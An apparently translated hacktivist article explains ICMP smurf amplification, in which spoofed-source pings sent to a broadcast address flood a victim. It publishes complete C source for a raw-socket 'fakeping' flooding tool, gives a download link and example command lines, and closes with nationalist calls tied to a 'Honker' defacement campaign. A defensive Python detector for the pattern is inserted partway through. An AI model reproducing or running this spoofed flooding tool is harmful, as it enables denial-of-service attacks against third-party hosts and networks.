Flood Ping attacks with disguised IP addresses


Recently, many people have been calling on everyone to ping a certain website. Technically, however, every kind of denial-of-service attack has to satisfy one condition: the attacker spends the least resources to cause the largest consumption on the other side. Measured against that, ping is not only odd, it is the reverse: the largest resource is spent for the smallest harm to the other party. It is also absurd: the "People's War" was a tactic of more than fifty years ago, and in the Internet era it is no longer a question of how many people you can muster.

Today we are talking about ping. Ping is a tool that checks whether a network host is alive by sending ICMP echo request packets (type 8, code 0). A long time ago some operating systems (Win95, for example) could not handle too many ping packets, which gave rise to the Ping of Death attack (using a large ping packet to kill the other side, or simply to fill its network). With upgrades to operating systems, network bandwidth and computer hardware, large ping packets no longer have much attack effect today (distributed attacks aside). If you insist on using ping packets to attack another host, it only works when the attack is amplified by some other feature of TCP/IP or a defect in the network topology (so-called positive feedback).

Under normal circumstances, the ping exchange is as follows:

Host A sends an ICMP echo request to host B.

Host B sends an ICMP echo reply back to host A.

Because ICMP is connectionless, it gives us an opening. Suppose host A disguises itself as host C and sends the ICMP echo request: what happens? Obviously host B takes the packet to have come from host C and sends its reply to host C, as follows:

          disguised as host C               echo reply goes to the wrong host
Host A ---------------------> Host B -----------------------------------> Host C

In this case host A only has to send ping packets and never has to process the returned ECHOREPLY, so the effect of the attack is amplified. In fact both host B and host C are attacked, while host A leaves no trace of its own. It is a concealed method of attack.

The method above is easy to implement by forging the IP address with a raw socket (SOCK_RAW), but even doubled like this it will not be very effective against a robust operating system with a lot of bandwidth. Do we have to go back to organizing a mass campaign? No: let the enemy amplify it for us. TCP/IP has the concept of a broadcast address: any host on the LAN receives a message sent to that address (just like a radio station). So what if ... ? That's right! If we send an ICMP echo request to the broadcast address (that is, ping the broadcast address), there will be a great many responses. On Ethernet, every host that accepts the broadcast packet answers with an ICMP_ECHOREPLY. If you want to test this, ping the broadcast address of your LAN from a Unix machine and you will see many DUP packets in the response, that is, duplicate replies. You will not see this on Windows, because Microsoft's ping program does not handle multiple responses: after receiving the first reply it discards the rest. Likewise, Microsoft's systems do not respond to packets sent to the broadcast address by default, so you had better test this on a LAN with a large number of Unix hosts.

Having come this far, you surely know what I want to do? Hey hey, that's right. When we pretend to be the attacked host and send a ping request to a broadcast address, every host behind that broadcast address responds to the request, which is equivalent to N times the attack strength (N = the number of hosts in the broadcast domain that answer the ping packet).
          disguised as host C                   every host on the broadcast network replies to the wrong host
Host A ---------------------> broadcast address =========================================> Host C
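From the defender's side the same exchange leaves two visible traces: echo requests addressed to a directed-broadcast address (the amplifier being abused) and a flood of echo replies arriving at a host that never sent a request (host C). The following detector is an added example, not code from the original article or from fakeping; the addresses, the monitored /24 and the capture records are constructed sample data.

```python
"""Flag the smurf pattern: requests to a directed-broadcast address and
floods of echo replies at a host that sent no request (added example, not
the article's code; addresses and the /24 are constructed)."""
from collections import Counter
from ipaddress import IPv4Address, IPv4Network

ECHO_REPLY, ECHO_REQUEST = 0, 8
LOCAL_NETS = [IPv4Network("192.168.15.0/24")]  # constructed: the monitored LAN


def is_directed_broadcast(dst, local_nets=LOCAL_NETS):
    """True if dst is the broadcast address of a monitored subnet."""
    return any(IPv4Address(dst) == net.broadcast_address for net in local_nets)


def analyse(packets, local_nets=LOCAL_NETS, reply_threshold=20):
    """Walk (src, dst, icmp_type) records; a reply is 'solicited' only if the
    (requester, responder) pair was seen as a request earlier in the capture."""
    requested = set()           # (requester, responder) pairs seen
    bcast_requests = Counter()  # (src, broadcast dst) -> request count
    unsolicited = Counter()     # victim -> replies with no matching request
    responders = {}             # victim -> distinct hosts that replied
    for src, dst, itype in packets:
        if itype == ECHO_REQUEST:
            requested.add((src, dst))
            if is_directed_broadcast(dst, local_nets):
                bcast_requests[(src, dst)] += 1
        elif itype == ECHO_REPLY and (dst, src) not in requested:
            # replies to a broadcast ping never match a (victim, host) request,
            # so every amplifier's reply lands here, as it does at host C
            unsolicited[dst] += 1
            responders.setdefault(dst, set()).add(src)
    findings = [("directed-broadcast-ping", src, dst, n)
                for (src, dst), n in bcast_requests.items()]
    for victim, n in unsolicited.items():
        if n >= reply_threshold:  # distinct responders = amplification factor N
            findings.append(("unsolicited-reply-flood", victim, len(responders[victim]), n))
    return findings


def sample_capture():
    """Constructed: one legitimate ping pair, then three requests spoofed from
    victim 10.0.0.9 to the broadcast address, each answered by 30 hosts."""
    pkts = [("10.0.0.5", "192.168.15.10", ECHO_REQUEST),
            ("192.168.15.10", "10.0.0.5", ECHO_REPLY)]
    for _ in range(3):
        pkts.append(("10.0.0.9", "192.168.15.255", ECHO_REQUEST))
        pkts += [(f"192.168.15.{h}", "10.0.0.9", ECHO_REPLY) for h in range(20, 50)]
    return pkts
```

On the sample capture, analyse() reports the spoofed broadcast ping (3 requests) and a 90-reply flood at 10.0.0.9 from 30 distinct amplifiers, while the legitimate request/reply pair produces nothing; on a router the first finding corresponds to the classic mitigation of disabling directed-broadcast forwarding.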

I wrote a fakeping tool that can be downloaded at http://www.patching.net/shotgun/fakeping.exe.

The usage is fakeping.exe fakeip targetip [packetsize]. If targetip is a broadcast address, then fakeip is the actual target of the attack.

The source code is published as follows:

```c
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

#define STATUS_FAILED 0xFFFF // process exit code; the define is not shown on the page, value assumed

typedef struct _iphdr // IP header
{
    unsigned char  h_verlen;       // 4-bit header length, 4-bit IP version number
    unsigned char  tos;            // 8-bit type of service (TOS)
    unsigned short total_len;      // 16-bit total length (in bytes)
    unsigned short ident;          // 16-bit identification
    unsigned short frag_and_flags; // 3-bit flags, 13-bit fragment offset
    unsigned char  ttl;            // 8-bit TTL
    unsigned char  proto;          // 8-bit protocol (TCP, UDP, or other)
    unsigned short checksum;       // 16-bit IP header checksum
    unsigned int   sourceip;       // 32-bit source IP address
    unsigned int   destip;         // 32-bit destination IP address
} IP_HEADER;

// ICMP header
typedef struct _ihdr
{
    BYTE   i_type;    // 8-bit type
    BYTE   i_code;    // 8-bit code
    USHORT i_cksum;   // 16-bit checksum
    USHORT i_id;      // identifier (the process id is generally used)
    USHORT i_seq;     // sequence number
    ULONG  timestamp; // timestamp
} ICMP_HEADER;

// checksum: helper that computes the Internet checksum over a buffer
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1)
    {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size)
    {
        cksum += *(unsigned char *)buffer; // odd trailing byte
    }
    cksum = (cksum >> 16) + (cksum & 0xFFFF); // fold the carries
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}

// fakeping main function
int main(int argc, char **argv)
{
    int datasize, errorcode, counter, flag;
    int timeout = 2000, sendseq = 0, packetsize = 32;
    char sendbuf[65535] = {0};
    WSADATA wsadata;
    SOCKET sockraw = (SOCKET)NULL;
    struct sockaddr_in destaddr;
    IP_HEADER ip_header;
    ICMP_HEADER icmp_header;
    char fakesourceip[20], destip[20];

    // Parse the command line parameters
    if (argc < 3)
    {
        printf("fakeping by shotgun\n");
        printf("This program can do ping-flooding from a fakeip\n");
        printf("using a broadcast IP as the fakeip will enhance the effect\n");
        printf("Email:\n");
        printf("Shotgun@Xici.Net\n");
        printf("homepage:\n");
        printf("http://It.Xici.Net\n");
        printf("http://www.Patching.Net\n");
        printf("Usage:\nfakeping.exe fakesourceip destinationip [packetsize]\n");
        printf("Example:\n");
        printf("fakeping.exe 192.168.15.23 192.168.15.255\n");
        printf("fakeping.exe 192.168.15.23 192.168.15.200 6400\n");
        exit(0);
    }
    strcpy(fakesourceip, argv[1]);
    strcpy(destip, argv[2]);
    if (argc > 3) packetsize = atoi(argv[3]);
    if (packetsize > 60000)
    {
        printf("error! Packet size too big, must <60 k\n");
        exit(0);
    }
    printf("now fake %s Ping %s using packet size = %d bytes\n", fakesourceip, destip, packetsize);
    printf("Ctrl + C to quit\n");

    // Initialize Winsock and the raw socket
    if ((errorcode = WSAStartup(MAKEWORD(2, 1), &wsadata)) != 0)
    {
        fprintf(stderr, "WSAStartup failed: %d\n", errorcode);
        ExitProcess(STATUS_FAILED);
    }

    if ((sockraw = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
    {
        fprintf(stderr, "WSASocket() failed: %d\n", WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }
    flag = TRUE;

    // Set IP_HDRINCL so that we fill in the IP header ourselves
    errorcode = setsockopt(sockraw, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
    if (errorcode == SOCKET_ERROR)
        printf("set IP_HDRINCL error!\n");
    __try
    {
        // Set the send timeout
        errorcode = setsockopt(sockraw, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
        if (errorcode == SOCKET_ERROR)
        {
            fprintf(stderr, "failed to set send timeout: %d\n", WSAGetLastError());
            __leave;
        }
        memset(&destaddr, 0, sizeof(destaddr));
        destaddr.sin_family = AF_INET;
        destaddr.sin_addr.s_addr = inet_addr(destip);

        // Fill in the IP header
        ip_header.h_verlen = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long)); // 4-bit version, 4-bit header length in 32-bit words
        ip_header.total_len = htons(sizeof(ip_header) + sizeof(icmp_header));     // 16-bit total length (in bytes)
        ip_header.ident = 1;                          // 16-bit identification
        ip_header.frag_and_flags = 0;                 // 3-bit flags
        ip_header.ttl = 128;                          // 8-bit TTL
        ip_header.proto = IPPROTO_ICMP;               // 8-bit protocol
        ip_header.checksum = 0;                       // 16-bit IP header checksum, computed below
        ip_header.sourceip = inet_addr(fakesourceip); // 32-bit source IP address (the disguised one)
        ip_header.destip = inet_addr(destip);         // 32-bit destination IP address

        // Fill in the ICMP header
        icmp_header.i_type = 8; // echo request
        icmp_header.i_code = 0;
        icmp_header.i_cksum = 0;
        icmp_header.i_id = 2;
        icmp_header.timestamp = 999;
        icmp_header.i_seq = 999;
        memcpy(sendbuf, &icmp_header, sizeof(icmp_header));
        memset(sendbuf + sizeof(icmp_header), 'E', packetsize);
        icmp_header.i_cksum = checksum((USHORT *)sendbuf, sizeof(icmp_header) + packetsize);
        memcpy(sendbuf, &ip_header, sizeof(ip_header));
        memcpy(sendbuf + sizeof(ip_header), &icmp_header, sizeof(icmp_header));
        memset(sendbuf + sizeof(ip_header) + sizeof(icmp_header), 'E', packetsize);
        memset(sendbuf + sizeof(ip_header) + sizeof(icmp_header) + packetsize, 0, 1);
        // Compute the size of the send buffer
        datasize = sizeof(ip_header) + sizeof(icmp_header) + packetsize;
        ip_header.checksum = checksum((USHORT *)sendbuf, datasize);

        // Fill the send buffer
        memcpy(sendbuf, &ip_header, sizeof(ip_header));
        while (1)
        {
            Sleep(100);
            printf(".");
            for (counter = 0; counter < 1024; counter++)
            {
                // Send one ICMP packet
                errorcode = sendto(sockraw, sendbuf, datasize, 0, (struct sockaddr *)&destaddr, sizeof(destaddr));
                if (errorcode == SOCKET_ERROR) printf("\nSend error: %d\n", GetLastError());
            }
        }
    } // end of try

    __finally
    {
        if (sockraw != INVALID_SOCKET) closesocket(sockraw);
        WSACleanup();
    }
    return 0;
}
```

The purpose of this article is not to call on everyone to use the fakeping tool to attack U.S. sites. I only want to show a little of what the technology can do. If pinging together is like fighting with cannon, fakeping can at best be called a musket, while the United States has built aircraft carriers (the complexity of an operating system is comparable to that of an aircraft carrier). Can broadswords, spears or muskets fight an aircraft carrier? This is moving and tragic, but is there really no other way? Can we not go back and build our own warships? If the experts of the Second Artillery also came out to join in the pinging in this Honker (red guest) war, and if the technical staff of Xichang also went off to join the homepage-defacing movement, we will not die!
